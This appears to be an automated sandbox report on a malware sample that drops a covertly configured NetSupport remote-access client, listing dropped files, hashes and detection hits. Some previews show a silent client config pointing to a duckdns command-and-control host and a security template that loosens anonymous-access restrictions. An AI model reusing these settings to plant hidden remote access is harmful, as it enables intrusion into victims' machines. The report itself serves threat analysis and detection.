                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):837
                                                                                      Entropy (8bit):5.545169772353752
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                      MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                      SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                      SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                      SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                      Malicious:false
                                                                                      Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):7455
                                                                                      Entropy (8bit):5.3062167321343745
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:RYvnYKY7YuY8YAYzhY8Y3YpYsULTYdYfYpQYPNYKYZ3YYkYRY1Yn6U8bYWYFYLYQ:RabeTtREhzaeKLTYiXQNJHFCK4Sxgezh
                                                                                      MD5:AEDC5EDF565BCBF2C77BD2E6F102E70B
                                                                                      SHA1:B72C62DDE21AC778AE81C91E6168C917F78A1A24
                                                                                      SHA-256:905767B0E08398F63864DF6846AE787372F9969E02193CF6CCB85962EAD1FCDD
                                                                                      SHA-512:7DF069D8ED310923D4D6A64E4886E05B999A682C5764AD235C090A61E926FE2EEF8EBB5280736CA9690868C9851635C743C259FE581C7A31C2AAC2F5951D577B
                                                                                      Malicious:false
                                                                                      Preview:[DLL31]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"TutorDeskIcon",STRING..Arg2=in,[TUTORDESKICON],STRING..Arg3=out,[TUTORDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL30]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"TechConsoleDeskIcon",STRING..Arg2=in,[TECHCONSOLEDESKICON],STRING..Arg3=out,[TECHCONSOLEDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL29]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"ControlDeskIcon",STRING..Arg2=in,[CONTROLDESKICON],STRING..Arg3=out,[CONTROLDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL28]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStrin
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):253
                                                                                      Entropy (8bit):5.069358624511852
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                      MD5:D2C2217861F5535686409D80A0867F6F
                                                                                      SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                      SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                      SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                      Malicious:false
                                                                                      Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..
                                                                                      Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                      Category:dropped
                                                                                      Size (bytes):41645568
                                                                                      Entropy (8bit):7.965918169264881
                                                                                      Encrypted:false
                                                                                      SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                      MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                      SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                      SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                      SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Temp\vrep.msi, Author: Joe Security
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):837
                                                                                      Entropy (8bit):5.545169772353752
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                      MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                      SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                      SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                      SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                      Malicious:false
                                                                                      Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.243856189774724
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:tekKKv0ov:JR8y
                                                                                      MD5:C05C19B006D57DD4C90785CBE5C7877B
                                                                                      SHA1:34BEEBB832E53E4A3B9B3349919689FDF1401151
                                                                                      SHA-256:00E0C629D5645C15DF66ADCF99E8A0A3E517D7A7876141AE7A752F0585EEC047
                                                                                      SHA-512:BEDE1E24476A12E9B1F29962254B19B357BFDFBE5C6EEC9A2FCA6C1B2105F4CEC1D5872F6BE269EF39D6E5CC542DC587EA9555EF87687BAC64B3FF0DE16C0F8C
                                                                                      Malicious:false
                                                                                      Preview:[Client]..RoomSpec=Eval..
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):928
                                                                                      Entropy (8bit):3.5084050573465384
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q+eS1kWlWlp+an4gb0mfkPz4lmfkPVvmfkPVWmfs8xU37+NylWl8ajEiRFGjowA:Q+eS3WTr4gtc79cAc9U8E+AW1EMAFA
                                                                                      MD5:0973EE7629C5602C2CAF0146AC93058C
                                                                                      SHA1:2586483C867FC413132E6874C59A75B027E90FBF
                                                                                      SHA-256:2DA5A8A9B0708F1AEBF60379A04E46BF33C5B06DD64916C4EB4F321E34C7E631
                                                                                      SHA-512:D92DF68440D735836135F08F256783452ABDE2DC66163C693C2AEA144A7D7463C0F765E4AA684E07315799FB62E194B076F631BAF8229ECEC13E88A366638D7A
                                                                                      Malicious:false
                                                                                      Preview:[Unicode]..Unicode=yes..[System Access]..LSAAnonymousNameLookup = 1..[Registry Values]..MACHINE\System\CurrentControlSet\Control\Lsa\EveryoneIncludesAnonymous=4,1..MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymous=4,0..MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM=4,0..MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RestrictNullSessAccess=4,0..[Privilege Rights]..[Version]..signature="$CHICAGO$"..Revision=1..
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):253
                                                                                      Entropy (8bit):5.069358624511852
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                      MD5:D2C2217861F5535686409D80A0867F6F
                                                                                      SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                      SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                      SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                      Malicious:false
                                                                                      Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):506
                                                                                      Entropy (8bit):4.906453708261214
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:NUQi44RRN4CZCgivf2Ik2IgC0cxP/6Xrov:iJ4y4CZC/f2/2B2H6O
                                                                                      MD5:FF7C0D2DBB9195083BBABAFF482D5ED6
                                                                                      SHA1:5C2EFBF855C376CE1B93E681C54A367A407495DC
                                                                                      SHA-256:065D817596D710D5A06060241ACC207B82B844530CC56FF842FF53D8FF92A075
                                                                                      SHA-512:EA226B3A55FC59175136F104DF497EBF5055624FB1C1C8073B249DFC5E1ED5818A6FEEE995AA82CF9ED050F1ADC7A62994C90B1AF03569DFE0D4551EE2BC70C9
                                                                                      Malicious:false
                                                                                      Preview:5..0x61f7dbcb..LongName=NetSupport Manager..ShortName=NSM..Home=NSM..TLA=NSM..NSSName=NetSupport School..NSSTLA=NSS..SupportWWW=www.pci.co.uk/support|http://www.pci.co.uk/support..SupportEMail=support@pci.co.uk|mailto:support@pci.co.uk..NSMAppDataDir=NetSupport\NetSupport Manager..NSSAppDataDir=NetSupport\NetSupport School..NSSConfName=NetSupport School..AssistantName=Tutor Assistant..AssistantURL=http://www.netsupportschool.com/tutor-assistant.asp..TechConsole=1..SupportsChrome=1..SupportsAndroid=1..
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                      Category:dropped
                                                                                      Size (bytes):157303
                                                                                      Entropy (8bit):7.89872596637976
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:duYWawdwZ7n0IjSTIvtFgSHcvCq1vdJojjXwDWaSRKjG88gs9A6BmgOUy:dI6Z7NvXcDJPo2WaMuXts9mUy
                                                                                      MD5:A9B2B2B4D72B44C182FF8403C97078BD
                                                                                      SHA1:808BE17D64883BF0B550B4B2E621D206736421D0
                                                                                      SHA-256:B86947F654351E605ACF0E3D09A00B4A20648CA60168476D1FBE6C4D9EEFE300
                                                                                      SHA-512:9459F723ACE5CFBEA23FC66738954A2383C730517486E3DE1F5CE70F48CDF039204683CA19E60FEA76616500CC7C82242051ABC04CC0F8D66BCDC46069AB9CBC
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):642
                                                                                      Entropy (8bit):3.6462235351457646
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q+4aVzvlXZMe5C6izCKaOPQ40bdpYm2o2nLCSm2TlCEtIlLlDtIloszlu:Q+LvjFihPQldjLG2Smi4EsDFyQ
                                                                                      MD5:9ADACE2EE6491BB7727E33B26D08EE21
                                                                                      SHA1:74F56456E8190F259D689D4FE9EC396989534010
                                                                                      SHA-256:440EA24D4A48DE2737817492926A97457151DC3BEB71BA66207AC33CBBC8F7D3
                                                                                      SHA-512:CD5FA2E207ED2A29A1E18F05374276D5528B5270B68E94F45F9819605192A4081B2394CAA6EF07B1B5D407EA0BBE153E825213F13C1CBB75681158A3827F48AD
                                                                                      Malicious:false
                                                                                      Preview:[GeneralInfo]..PathToISBEW64Exe=....[KeyList]..FileKey1=icoviewer.dll..Count=1....[icoviewer.dll]..FileKey=icoviewer.dll..FullPath=C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll..Component=IcoViewer.dll..RegCmdLine=..UnRegCmdLine=..ActionState=2..64Bit=No..Cost=1..Order=32600..Failed=No..HRESULT=0..
                                                                                      Process:C:\Windows\System32\cmd.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):433152
                                                                                      Entropy (8bit):5.502549953174867
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
                                                                                      MD5:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      SHA1:F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
                                                                                      SHA-256:73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
                                                                                      SHA-512:6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):763872
                                                                                      Entropy (8bit):6.574853256300612
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                      MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                      SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                      SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                      SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI1387.tmp, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):250616
                                                                                      Entropy (8bit):6.25532114530443
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                      MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                      SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                      SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                      SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI23B6.tmp, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):763872
                                                                                      Entropy (8bit):6.574853256300612
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                      MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                      SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                      SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                      SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI23E6.tmp, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):250616
                                                                                      Entropy (8bit):6.25532114530443
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                      MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                      SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                      SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                      SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):173816
                                                                                      Entropy (8bit):6.23179846686102
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:CfxQXjgrNmFy/E9XFPaKON5hqTYYPOaLId+MSBFskIvE51+VMA1:CfuzgrNW5iKQ5hdIVqdzGry
                                                                                      MD5:0E6FDA2B8425C9513C774CF29A1BC72D
                                                                                      SHA1:A79FFA24CB5956398DED44DA24793A2067B85DD0
                                                                                      SHA-256:E946B2FAE0B36C43064463A8C16A2774ADAC30C4188C5AF90E9338B903C501C9
                                                                                      SHA-512:285BB7759A1214ABED36162AC8BE2D48DF17A05278C4DE97562448E20FD43B635563A6819F37E23D92A5F5ED0205A68BFFE43DAC0D3A67513BD0303B4E7F89AA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):523512
                                                                                      Entropy (8bit):6.417003633431126
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                      MD5:D524B639A3A088155981B9B4EFA55631
                                                                                      SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                      SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                      SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):499168
                                                                                      Entropy (8bit):6.471749736248109
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                      MD5:3085D62326CC1AE4AB21489576973621
                                                                                      SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                      SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                      SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI37C0.tmp, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):173816
                                                                                      Entropy (8bit):6.23179846686102
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:CfxQXjgrNmFy/E9XFPaKON5hqTYYPOaLId+MSBFskIvE51+VMA1:CfuzgrNW5iKQ5hdIVqdzGry
                                                                                      MD5:0E6FDA2B8425C9513C774CF29A1BC72D
                                                                                      SHA1:A79FFA24CB5956398DED44DA24793A2067B85DD0
                                                                                      SHA-256:E946B2FAE0B36C43064463A8C16A2774ADAC30C4188C5AF90E9338B903C501C9
                                                                                      SHA-512:285BB7759A1214ABED36162AC8BE2D48DF17A05278C4DE97562448E20FD43B635563A6819F37E23D92A5F5ED0205A68BFFE43DAC0D3A67513BD0303B4E7F89AA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):523512
                                                                                      Entropy (8bit):6.417003633431126
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                      MD5:D524B639A3A088155981B9B4EFA55631
                                                                                      SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                      SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                      SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
